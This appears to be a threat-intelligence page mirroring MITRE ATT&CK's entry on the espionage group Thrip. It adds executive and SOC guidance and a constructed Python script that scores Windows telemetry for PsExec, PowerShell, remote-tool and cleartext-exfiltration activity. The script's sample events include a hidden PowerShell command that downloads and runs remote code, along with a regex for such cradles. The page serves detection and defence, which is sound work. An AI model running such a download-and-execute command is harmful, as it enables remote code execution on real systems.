G0076: Thrip
Analyst context for executives and security teams
Thrip matters because ATT&CK describes it as an espionage group associated with satellite communications, telecom, and defense contractor targeting, using both custom malware and legitimate administration tools. For leaders, the practical issue is not just “malware detection”; it is whether the organization can recognize credential theft, remote administration abuse, scripted execution, and data movement that may look like normal IT activity.
Executive priority
Prioritize this as a resilience and assurance question for high-value engineering, communications, defense, and infrastructure environments. Executives should ask whether SOC and IR teams can prove visibility over privileged Windows activity, remote access tooling, PowerShell use, and outbound unencrypted data transfer. This also supports audit and compliance evidence: approved remote tools, privileged access controls, logging retention, and incident response playbooks should be demonstrable, not assumed.
Technical view
ATT&CK provides no official detection text for Thrip, so defensive validation should be built from the related behaviors and software: Mimikatz credential dumping, PsExec-style remote execution, PowerShell execution, remote desktop software for command and control, Catchamas information stealing, and exfiltration over unencrypted non-C2 protocols. SOC teams should test whether legitimate admin activity can be distinguished from suspicious use by context: source host, account privilege, command line, service creation, lateral movement pattern, remote session timing, and unusual outbound destinations or protocols.
Likely telemetry
- Windows security events for logon activity, privileged account use, service creation, and remote execution patterns
- Endpoint detection telemetry including process creation, command-line arguments, parent-child process relationships, and file execution metadata
- PowerShell logging, including script block/module logging where available
- Credential access indicators such as LSASS access attempts or credential dumping detections
- PsExec-related evidence such as admin share access, remote service creation, and named pipe activity
Detection direction
- Validate detections for credential dumping and privileged authentication anomalies rather than relying only on malware signatures.
- Tune PsExec and PowerShell detections to account for legitimate administration while alerting on unusual source systems, rare accounts, suspicious command lines, and lateral movement bursts.
- Maintain an allowlist and audit trail for remote desktop/support software; alert on newly introduced, unauthorized, or unusual remote access tools.
- Monitor outbound unencrypted protocols for volume, destination rarity, sensitive host sources, and transfers outside expected business workflows.
- Use relationship context to build analytic coverage across the chain: credential access, remote execution, interactive control, information theft, and exfiltration.
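The "Technical view" and the "Detection direction" items above both come down to one analytic question: can the same PsExec, PowerShell, remote-desktop and cleartext-egress events be scored by context (source host, account, command line, destination, volume) and then correlated into a chain per host and account? The following Python is an added example written for this page, not code from MITRE, Symantec or Glexia. Everything in it is constructed: the environment baseline (jump hosts, approved admin accounts, the remote-tool allowlist, approved FTP servers, sensitive hosts), the binary names in `KNOWN_REMOTE_TOOLS`, and the sample events, which are a hand-written stand-in for normalized Windows service-creation, process-creation and network-connection telemetry rather than real log records.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# --- Constructed environment baseline (assumed, not taken from the ATT&CK page) ---
ADMIN_JUMP_HOSTS = {"JUMP01"}                 # hosts from which PsExec-style admin is expected
ADMIN_ACCOUNTS = {"CORP\\admin.jane"}         # accounts allowed to do remote execution
APPROVED_REMOTE_TOOLS = {"teamviewer.exe"}    # remote desktop/support allowlist
KNOWN_REMOTE_TOOLS = {"teamviewer.exe", "logmein.exe", "anydesk.exe"}  # constructed names
APPROVED_FTP_DESTS = {"10.0.5.20"}            # internal FTP server used by build workflows
SENSITIVE_HOSTS = {"ENG-FS01"}                # engineering file server
CLEARTEXT_PORTS = {21, 80}
BULK_BYTES = 50 * 1024 * 1024                 # 50 MiB outbound in one flow counts as bulk

# Download-cradle / encoded-command patterns in PowerShell command lines
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|-encodedcommand|\s-e(nc|c)?\s|\biex\b",
    re.I,
)


@dataclass(frozen=True)
class Event:
    host: str
    user: str
    kind: str            # "process" | "service" | "netconn"
    source_host: str = ""  # for service events: where the remote request came from
    image: str = ""
    cmdline: str = ""
    service: str = ""
    dst: str = ""
    dst_port: int = 0
    bytes_out: int = 0


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    score: int
    reason: str


def check_event(e: Event) -> list[Finding]:
    """Score one event by context; a benign admin action yields a low score or nothing."""
    out = []
    if e.kind == "service" and (e.service.upper() == "PSEXESVC" or "\\ADMIN$\\" in e.image.upper()):
        score, why = 1, ["PsExec-style remote service creation"]
        if e.source_host not in ADMIN_JUMP_HOSTS:
            score, why = score + 2, why + [f"source {e.source_host} is not a jump host"]
        if e.user not in ADMIN_ACCOUNTS:
            score, why = score + 2, why + [f"{e.user} is not an approved admin account"]
        out.append(Finding(e.host, e.user, "remote_execution", score, "; ".join(why)))
    if e.kind == "process":
        img = e.image.lower().rsplit("\\", 1)[-1]
        if img in ("powershell.exe", "pwsh.exe") and CRADLE.search(e.cmdline):
            out.append(Finding(e.host, e.user, "powershell_download", 3,
                               f"download/encoded pattern: {e.cmdline[:60]}"))
        if img in KNOWN_REMOTE_TOOLS and img not in APPROVED_REMOTE_TOOLS:
            out.append(Finding(e.host, e.user, "unapproved_remote_tool", 4, f"{img} not on allowlist"))
    if e.kind == "netconn" and e.dst_port in CLEARTEXT_PORTS:
        score, why = 0, []
        if e.dst not in APPROVED_FTP_DESTS:
            score, why = score + 2, why + [f"{e.dst}:{e.dst_port} is not an approved cleartext destination"]
        if e.bytes_out >= BULK_BYTES:
            score, why = score + 2, why + [f"{e.bytes_out} bytes out in one flow"]
        if e.host in SENSITIVE_HOSTS:
            score, why = score + 1, why + ["from sensitive host"]
        if score:
            out.append(Finding(e.host, e.user, "cleartext_egress", score, "; ".join(why)))
    return out


def triage(events: list[Event]) -> list[Finding]:
    return [f for e in events for f in check_event(e)]


def escalate(findings: list[Finding], min_rules: int = 3) -> dict:
    """Correlate per (host, user); escalate when the chain spans >= min_rules distinct stages."""
    by_actor = defaultdict(list)
    for f in findings:
        by_actor[(f.host, f.user)].append(f)
    return {
        actor: {"rules": sorted({f.rule for f in fs}), "score": sum(f.score for f in fs)}
        for actor, fs in by_actor.items()
        if len({f.rule for f in fs}) >= min_rules
    }


# Constructed sample telemetry: one legitimate admin action, one suspicious chain, two benign events
SAMPLE_EVENTS = [
    Event("ENG-WS07", "CORP\\admin.jane", "service", source_host="JUMP01",
          service="PSEXESVC", image="\\\\ENG-WS07\\ADMIN$\\PSEXESVC.exe"),
    Event("ENG-FS01", "CORP\\jdoe", "service", source_host="HR-WS12",
          service="PSEXESVC", image="\\\\ENG-FS01\\ADMIN$\\PSEXESVC.exe"),
    Event("ENG-FS01", "CORP\\jdoe", "process",
          image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          cmdline="powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a')"),
    Event("ENG-FS01", "CORP\\jdoe", "process", image="C:\\Users\\jdoe\\AppData\\Local\\logmein.exe"),
    Event("ENG-FS01", "CORP\\jdoe", "netconn", dst="203.0.113.9", dst_port=21, bytes_out=120 * 1024 * 1024),
    Event("HR-WS12", "CORP\\asmith", "process", image="C:\\Program Files\\TeamViewer\\teamviewer.exe"),
    Event("BUILD01", "CORP\\svc-build", "netconn", dst="10.0.5.20", dst_port=21, bytes_out=1024),
]

if __name__ == "__main__":
    findings = triage(SAMPLE_EVENTS)
    for f in findings:
        print(f"{f.host} {f.user} [{f.rule} +{f.score}] {f.reason}")
    for actor, summary in escalate(findings).items():
        print("ESCALATE", actor, summary)
```

The point of the design is in the scoring, not the patterns: the jump-host PsExec run by an approved admin produces a score-1 record that is kept for audit but never escalated, while the same service-creation event from an unexpected source host and a rare account scores 5 and, once the PowerShell cradle, the unapproved remote tool and the bulk FTP flow from the sensitive host land on the same host and account, the four-stage chain is escalated as one incident.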
Mitigation priorities
- Start with privileged access hygiene: reduce standing administrative rights, enforce strong authentication, and review where high-value credentials can be exposed on Windows systems.
- Control and monitor legitimate administration tools such as PsExec, PowerShell, and remote desktop/support software through policy, logging, and approved-use governance.
- Segment and closely monitor high-value communications, defense, engineering, and operational environments where applicable to the organization.
- Improve egress governance by restricting unnecessary unencrypted outbound protocols and reviewing destinations allowed from sensitive systems.
- Ensure incident response playbooks cover credential theft, lateral movement using admin tools, remote access tool abuse, and suspected data exfiltration.
Analyst notes and limits
The decision value is in validating whether “living off the land” activity is observable and explainable. Thrip’s related software and techniques point to a blend of credential theft, legitimate tool abuse, remote control, and data theft, which often defeats programs that focus only on known malware indicators.
The supplied ATT&CK object does not specify platforms or tactics for the group itself and provides no official detection guidance. Platform references come only from related software and techniques. Local environment data is required to determine relevance, normal administrative baselines, and actual detection coverage.
Thrip
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059.001 | PowerShell (sub-technique) | Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance. [1] |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol (sub-technique) | Thrip has used WinSCP to exfiltrate data from a targeted organization over FTP. [1] |
| Enterprise | T1219.002 | Remote Desktop Software (sub-technique) | Thrip used a cloud-based remote access software called LogMeIn for their attacks. [1] |
| Enterprise | T1588.002 | Tool (sub-technique) | |
Groups, software, and campaigns
S0029: PsExec
S0002: Mimikatz
S0261: Catchamas
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources (Updates).
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.2 | | Current bundle | a03a2d6f2470… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Symantec Thrip June 2018: Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018.
[2] Thrip (Citation: Symantec Thrip June 2018)
[3] mitre-attack G0076
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.